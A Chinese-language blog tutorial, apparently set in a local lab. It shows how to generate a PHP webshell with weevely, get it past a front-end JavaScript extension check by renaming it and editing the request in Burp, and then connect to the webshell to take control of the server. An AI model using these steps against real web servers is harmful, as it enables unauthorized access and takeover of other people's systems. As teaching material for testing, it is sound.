当我们给web中上传webshell时,通常会遇到基于前端的js验证,来判断是否是jpg或者是png文件,如果不是,则阻断文件的上传。今天,我们一起来分析下,如何绕过前端js文件的验证。

生成PHP版的webshell

kali中执行下面命令:

weevely generate 123456 /root/hacker.php

即,在root目录下生成了一个hacker.phpwebshell
我们上传刚才生成的webshell,则提示如下
2.png
提示,文件格式不对,我们查看原因。
F12键,我们查看源码
3.png
我们得到了下方的代码

function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("请选择要上传的文件!");
            return false;
        }
        //定义允许上传的文件类型
        var allow_ext = ".jpg|.png|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
            alert(errMsg);
            return false;
        }
    }

这是很典型的前端JS判断脚本,ok 我们看看怎样突破来自前端的限制。

  • 1,将我们生的的hacker.php改名为hacker.jpg
  • 2,启动神器burp设置好代理。
    OK,准备好之后,我们开始上传文件。

4.png
这时,我们可以看到burp已经抓取了http包内容
现在我们需要在burp中将hacker.jpg改名为hacker.php然后点击intercept is off放行即可。
7.png
如图,我们则成功上传了webshell。点击右键-属性,查看文件上传的位置。
8.png

用kali连接webshell

weevely http://192.168.232.204/upload/hacker.php 123456

9.png

如上如图,成功获得服务器的权限。

题记

  • 1,本次演示仅在本地服务器测试,请勿非法使用。所造成的一切后果自行承担。
  • 2,后期还会更新其他类型的webshell上传方法,敬请期待。
Last modification:December 13th, 2018 at 11:02 pm
正在沿街乞讨中……